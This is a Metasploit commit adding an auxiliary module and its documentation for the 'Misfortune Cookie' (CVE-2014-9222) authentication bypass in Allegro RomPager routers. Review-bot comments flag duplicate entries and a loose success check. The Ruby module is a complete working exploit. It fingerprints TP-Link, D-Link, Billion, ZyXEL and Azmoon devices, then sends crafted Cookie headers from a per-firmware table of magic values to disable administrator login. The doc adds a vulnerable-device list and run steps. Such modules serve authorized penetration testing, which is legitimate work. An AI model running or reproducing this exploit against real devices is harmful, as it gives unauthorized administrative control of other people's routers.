
Commit 24151a9

author
Brent Cook
committed
Land rapid7#7753, Add auxiliary RomPager misfortune cookie authentication bypass
2 parents c4f1e0d + 3125dc2 commit 24151a9


2 files changed

+361
-0
lines changed

Lines changed: 128 additions & 0 deletions
@@ -0,0 +1,128 @@
1+
## Vulnerable devices
2+
3+
Following is list of devices and firmware versions with known values used for exploitation
4+
0. Azmoon AZ-D140W - 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1
5+
1. Billion BiPAC 5102S - Av2.7.0.23 (UE0.B1C)
6+
2. Billion BiPAC 5102S - Bv2.7.0.23 (UE0.B1C)
7+
3. Billion BiPAC 5200 - 2.11.84.0(UE2.C2)3.11.11.6
8+
4. Billion BiPAC 5200 - 2_11_62_2_ UE0.C2D_3_10_16_0
9+
5. Billion BiPAC 5200A - 2_10_5 _0(RE0.C2)3_6_0_0
10+
6. Billion BiPAC 5200A - 2_11_38_0 (RE0.C29)3_10_5_0
11+
7. Billion BiPAC 5200GR4 - 2.11.91.0(RE2.C29)3.11.11.52
12+
8. Billion BiPAC 5200SRD - 2.10.5.0 (UE0.C2C) 3.6.0.0
13+
9. Billion BiPAC 5200SRD - 2.12.17.0_UE2.C3_3.12.17.0
14+
10. Billion BiPAC 5200SRD - 2_11_62_2(UE0.C3D)3_11_11_22
15+
11. D-Link DSL-2520U - Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL
16+
12. D-Link DSL-2600U - Z1_DSL-2600U
17+
13. D-Link DSL-2600U - Z2_V1.08_ras
18+
14. TP-Link TD-8616 - V2_080513
19+
15. TP-Link TD-8816 - V4_100528_Russia
20+
16. TP-Link TD-8816 - V4_100524
21+
17. TP-Link TD-8816 - V5_100528_Russia
22+
18. TP-Link TD-8816 - V5_100524
23+
19. TP-Link TD-8816 - V5_100903
24+
20. TP-Link TD-8816 - V6_100907
25+
21. TP-Link TD-8816 - V7_111103
26+
22. TP-Link TD-8816 - V7_130204
27+
23. TP-Link TD-8817 - V5_100524
28+
24. TP-Link TD-8817 - V5_100702_TR
29+
25. TP-Link TD-8817 - V5_100903
30+
26. TP-Link TD-8817 - V6_100907
31+
27. TP-Link TD-8817 - V6_101221
32+
28. TP-Link TD-8817 - V7_110826
33+
29. TP-Link TD-8817 - V7_130217
34+
30. TP-Link TD-8817 - V7_120509
35+
31. TP-Link TD-8817 - V8_140311
36+
32. TP-Link TD-8820 - V3_091223
37+
33. TP-Link TD-8840T - V1_080520
38+
34. TP-Link TD-8840T - V2_100525
39+
35. TP-Link TD-8840T - V2_100702_TR
40+
36. TP-Link TD-8840T - V2_090609
41+
37. TP-Link TD-8840T - V3_101208
42+
38. TP-Link TD-8840T - V3_110221
43+
39. TP-Link TD-8840T - V3_120531
44+
40. TP-Link TD-W8101G - V1_090107
45+
41. TP-Link TD-W8101G - V1_090107
46+
42. TP-Link TD-W8101G - V2_100819
47+
43. TP-Link TD-W8101G - V2_101015_TR
48+
44. TP-Link TD-W8101G - V2_101101
49+
45. TP-Link TD-W8101G - V3_110119
50+
46. TP-Link TD-W8101G - V3_120213
51+
47. TP-Link TD-W8101G - V3_120604
52+
48. TP-Link TD-W8151N - V3_120530
53+
49. TP-Link TD-W8901G - V1_080522
54+
50. TP-Link TD-W8901G - V1,2_080522
55+
51. TP-Link TD-W8901G - V2_090113_Turkish
56+
52. TP-Link TD-W8901G - V3_140512
57+
53. TP-Link TD-W8901G - V3_100603
58+
54. TP-Link TD-W8901G - V3_100702_TR
59+
55. TP-Link TD-W8901G - V3_100901
60+
56. TP-Link TD-W8901G - V6_110119
61+
57. TP-Link TD-W8901G - V6_110915
62+
58. TP-Link TD-W8901G - V6_120418
63+
59. TP-Link TD-W8901G - V6_120213
64+
60. TP-Link TD-W8901GB - V3_100727
65+
61. TP-Link TD-W8901GB - V3_100820
66+
62. TP-Link TD-W8901N - V1_111211
67+
63. TP-Link TD-W8951ND - V1_101124,100723,100728
68+
64. TP-Link TD-W8951ND - V1_110907
69+
65. TP-Link TD-W8951ND - V1_111125
70+
66. TP-Link TD-W8951ND - V3.0_110729_FI
71+
67. TP-Link TD-W8951ND - V3_110721
72+
68. TP-Link TD-W8951ND - V3_20110729_FI
73+
69. TP-Link TD-W8951ND - V4_120511
74+
70. TP-Link TD-W8951ND - V4_120607
75+
71. TP-Link TD-W8951ND - V4_120912_FL
76+
72. TP-Link TD-W8961NB - V1_110107
77+
73. TP-Link TD-W8961NB - V1_110519
78+
74. TP-Link TD-W8961NB - V2_120319
79+
75. TP-Link TD-W8961NB - V2_120823
80+
76. TP-Link TD-W8961ND - V1_100722,101122
81+
77. TP-Link TD-W8961ND - V1_101022_TR
82+
78. TP-Link TD-W8961ND - V1_111125
83+
79. TP-Link TD-W8961ND - V2_120427
84+
80. TP-Link TD-W8961ND - V2_120710_UK
85+
81. TP-Link TD-W8961ND - V2_120723_FI
86+
82. TP-Link TD-W8961ND - V3_120524,120808
87+
83. TP-Link TD-W8961ND - V3_120830
88+
84. ZyXEL P-660R-T3 - 3.40(BOQ.0)C0
89+
85. ZyXEL P-660RU-T3 - 3.40(BJR.0)C0
90+
91+
## Verification Steps
92+
93+
1. Start msfconsole
94+
2. Do: ```use auxiliary/admin/http/allegro_rompager_auth_bypass```
95+
3. Do: ```set rhost <ip>```
96+
4. Do: ```set rport <port>```
97+
5. Do: ```run```
98+
6. You should be able to login into the device without authentication
99+
100+
## Scenarios
101+
102+
Example run against TP-Link TD-8817:
103+
```
104+
msf > use auxiliary/admin/http/allegro_rompager_auth_bypass
105+
msf auxiliary(allegro_rompager_auth_bypass) > show options
106+
107+
Module options (auxiliary/admin/http/allegro_rompager_auth_bypass):
108+
109+
Name Current Setting Required Description
110+
---- --------------- -------- -----------
111+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
112+
RHOST 192.168.1.1 yes The target address
113+
RPORT 80 yes The target port
114+
SSL false no Negotiate SSL/TLS for outgoing connections
115+
TARGETURI / yes URI to test
116+
VHOST no HTTP server virtual host
117+
118+
119+
msf auxiliary(allegro_rompager_auth_bypass) > set rhost 192.168.1.1
120+
rhost => 192.168.1.1
121+
msf auxiliary(allegro_rompager_auth_bypass) > run
122+
123+
[+] Detected device:TP-Link TD-8817
124+
[-] Bad response
125+
[-] Bad response
126+
[+] Good response, please check host, authentication should be disabled
127+
[*] Auxiliary module execution completed
128+
```
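Review bot: The device list in this documentation file is inconsistent with itself and with the module source. Entries 40 and 41 are identical (`TP-Link TD-W8101G - V1_090107`), and `ZyXEL P-660RU-T3 - 3.40(BJR.0)C0` is presented as a known-vulnerable device even though the module marks that entry's values with `#Couldn't verify this`; drop the duplicate and note the unverified status next to the ZyXEL entry. The list also never explains what the "known values" are (the module uses them as the cookie number and padding length), so a one-line explanation would help anyone extending it. Minor style points: the verification steps wrap inline commands in triple backticks (```use auxiliary/admin/http/allegro_rompager_auth_bypass```), which markdown renders as code blocks rather than inline code, so single backticks are the convention here; "Following is list of devices" should read "The following is a list of devices", and "login into the device" should be "log in to the device".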
Lines changed: 233 additions & 0 deletions
@@ -0,0 +1,233 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
8+
class MetasploitModule < Msf::Auxiliary
9+
include Msf::Exploit::Remote::HttpClient
10+
include Msf::Auxiliary::Report
11+
12+
def initialize(info = {})
13+
super(update_info(
14+
info,
15+
'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",
16+
'Description' => %q(
17+
This module exploits HTTP servers that appear to be vulnerable to the
18+
'Misfortune Cookie' vulnerability which affects Allegro Software
19+
Rompager versions before 4.34 and can allow attackers to authenticate
20+
to the HTTP service as an administrator without providing valid
21+
credentials.
22+
),
23+
'Author' => [
24+
'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module
25+
'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module
26+
'Lior Oppenheim' # CVE-2014-9222
27+
],
28+
'References' => [
29+
['CVE', '2014-9222'],
30+
['URL', 'http://mis.fortunecook.ie'],
31+
['URL', 'http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices
32+
['URL', 'http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC
33+
],
34+
'DisclosureDate' => 'Dec 17 2014',
35+
'License' => MSF_LICENSE
36+
))
37+
38+
register_options(
39+
[
40+
OptString.new('TARGETURI', [true, 'URI to test', '/']),
41+
], Exploit::Remote::HttpClient
42+
)
43+
end
44+
45+
def headers
46+
{
47+
'Referer' => full_uri
48+
}
49+
end
50+
51+
# List of known values and models
52+
def devices_list
53+
{
54+
:'AZ-D140W'=>
55+
{:name=>'Azmoon', :model=>'AZ-D140W', :values=>[
56+
[107367693, 13]
57+
]},
58+
:'BiPAC 5102S'=>
59+
{:name=>'Billion', :model=>'BiPAC 5102S', :values=>[
60+
[107369694, 13]
61+
]},
62+
:'BiPAC 5200'=>
63+
{:name=>'Billion', :model=>'BiPAC 5200', :values=>[
64+
[107369545, 9],
65+
[107371218, 21]
66+
]},
67+
:'BiPAC 5200A'=>
68+
{:name=>'Billion', :model=>'BiPAC 5200A', :values=>[
69+
[107366366, 25],
70+
[107371453, 9]
71+
]},
72+
:'BiPAC 5200GR4'=>
73+
{:name=>'Billion', :model=>'BiPAC 5200GR4', :values=>[
74+
[107367690, 21]
75+
]},
76+
:'BiPAC 5200SRD'=>
77+
{:name=>'Billion', :model=>'BiPAC 5200SRD', :values=>[
78+
[107368270, 1],
79+
[107371378, 3],
80+
[107371218, 13]
81+
]},
82+
:'DSL-2520U'=>
83+
{:name=>'D-Link', :model=>'DSL-2520U', :values=>[
84+
[107368902, 25]
85+
]},
86+
:'DSL-2600U'=>
87+
{:name=>'D-Link', :model=>'DSL-2600U', :values=>[
88+
[107366496, 13],
89+
[107360133, 20]
90+
]},
91+
:'TD-8616'=>
92+
{:name=> 'TP-Link', :model=>'TD-8616', :values=>[
93+
[107371483, 21],
94+
[107369790, 17],
95+
[107371161, 1],
96+
[107371426, 17],
97+
[107370211, 5],
98+
]},
99+
:'TD-8817'=>
100+
{:name=> 'TP-Link', :model=>'TD-8817', :values=>[
101+
[107369790, 17],
102+
[107369788, 1],
103+
[107369522, 25],
104+
[107369316, 21],
105+
[107369321, 9],
106+
[107351277, 20]
107+
]},
108+
:'TD-8820'=>
109+
{:name=>'TP-Link', :model=>'TD-8820', :values=>[
110+
[107369768, 17]
111+
]},
112+
:'TD-8840T'=>
113+
{:name=>'TP-Link', :model=>'TD-8840T', :values=>[
114+
[107369845, 5],
115+
[107369790, 17],
116+
[107369570, 1],
117+
[107369766, 1],
118+
[107369764, 5],
119+
[107369688, 17]
120+
]},
121+
:'TD-W8101G'=>
122+
{:name=>'TP-Link', :model=>'TD-W8101G', :values=>[
123+
[107367772, 37],
124+
[107367808, 21],
125+
[107367751, 21],
126+
[107367749, 13],
127+
[107367765, 25],
128+
[107367052, 25],
129+
[107365835, 1]
130+
]},
131+
:'TD-W8151N'=>
132+
{:name=>'TP-Link', :model=>'TD-W8151N', :values=>[
133+
[107353867, 24]
134+
]},
135+
:'TD-W8901G'=>
136+
{:name=> 'TP-Link', :model=>'TD-W8901G', :values=>[
137+
[107367787, 21],
138+
[107368013, 5],
139+
[107367854, 9],
140+
[107367751, 21],
141+
[107367749, 13],
142+
[107367765, 25],
143+
[107367682, 21],
144+
[107365835, 1],
145+
[107367052, 25]
146+
]},
147+
:'TD-W8901GB'=>
148+
{:name=>'TP-Link', :model=>'TD-W8901GB', :values=>[
149+
[107367756, 13],
150+
[107369393, 21]
151+
]},
152+
:'TD-W8901N'=>
153+
{:name=>'TP-Link', :model=>'TD-W8901N', :values=>[
154+
[107353880, 0]
155+
]},
156+
:'TD-W8951ND'=>
157+
{:name=>'TP-Link', :model=>'TD-W8951ND', :values=>[
158+
[107369839, 25],
159+
[107369876, 13],
160+
[107366743, 21],
161+
[107364759, 25],
162+
[107364759, 13],
163+
[107364760, 21]
164+
]},
165+
:'TD-W8961NB'=>
166+
{:name=>'TP-Link', :model=>'TD-W8961NB', :values=>[
167+
[107369844, 17],
168+
[107367629, 21],
169+
[107366421, 13]
170+
]},
171+
:'TD-W8961ND'=>
172+
{:name=>'TP-Link', :model=>'TD-W8961ND', :values=>[
173+
[107369839, 25],
174+
[107369876, 13],
175+
[107364732, 25],
176+
[107364771, 37],
177+
[107364762, 29],
178+
[107353880, 0],
179+
[107353414, 36]
180+
]},
181+
:'P-660R-T3 v3'=> #This value works on devices with model P-660R-T3 v3 not P-660R-T3 v3s
182+
{:name=>'ZyXEL', :model=>'P-660R-T3', :values=>[
183+
[107369567, 21]
184+
]},
185+
:'P-660RU-T3 v2'=> #Couldn't verify this
186+
{:name=>'ZyXEL', :model=>'P-660R-T3', :values=>[
187+
[107369567, 21]
188+
]},
189+
}
190+
end
191+
192+
193+
def check_response_fingerprint(res, fallback_status)
194+
fp = http_fingerprint(response: res)
195+
vprint_status("Fingerprint: #{fp}")
196+
if /realm="(?<model>.+)"/ =~ fp
197+
return model
198+
end
199+
fallback_status
200+
end
201+
202+
def run
203+
res = send_request_raw(
204+
'uri' => normalize_uri(target_uri.path.to_s),
205+
'method' => 'GET',
206+
)
207+
model = check_response_fingerprint(res, Exploit::CheckCode::Detected)
208+
if model != Exploit::CheckCode::Detected
209+
devices = devices_list[model.to_sym]
210+
if devices != nil
211+
print_good("Detected device:#{devices[:name]} #{devices[:model]}")
212+
devices[:values].each { |value|
213+
cookie = "C#{value[0]}=#{'B'*value[1]}\x00"
214+
res = send_request_raw(
215+
'uri' => normalize_uri(target_uri.path.to_s),
216+
'method' => 'GET',
217+
'headers' => headers.merge('Cookie' => cookie)
218+
)
219+
if res != nil and res.code <= 302
220+
print_good('Good response, please check host, authentication should be disabled')
221+
break
222+
else
223+
print_error('Bad response')
224+
end
225+
}
226+
else
227+
print_error("No matching values for fingerprint #{model}")
228+
end
229+
else
230+
print_error('Unknown device')
231+
end
232+
end
233+
end
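Review bot: The success check `if res != nil and res.code <= 302` treats any 1xx, 2xx or 3xx response, including a redirect back to the login page, as evidence that the bypass worked, so the module prints "Good response, please check host, authentication should be disabled" on what may be a false positive; check for an element of the authenticated page in the response body rather than relying on the status code alone, and per the framework's Ruby style use `res && res.code <= 302` instead of `!= nil` with `and`. The result of the first `send_request_raw` is passed straight into `http_fingerprint` with no nil check, so a connection failure is not reported cleanly before the fingerprint step. The `:'P-660RU-T3 v2'` entry also sets `:model=>'P-660R-T3'` with the same value `[107369567, 21]` as the preceding `:'P-660R-T3 v3'` entry, which looks like a copy-paste leftover and would make the "Detected device" message name the wrong model. Finally, the `Name` field spells the product "RomPager" while the `Description` says "Rompager"; pick one.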
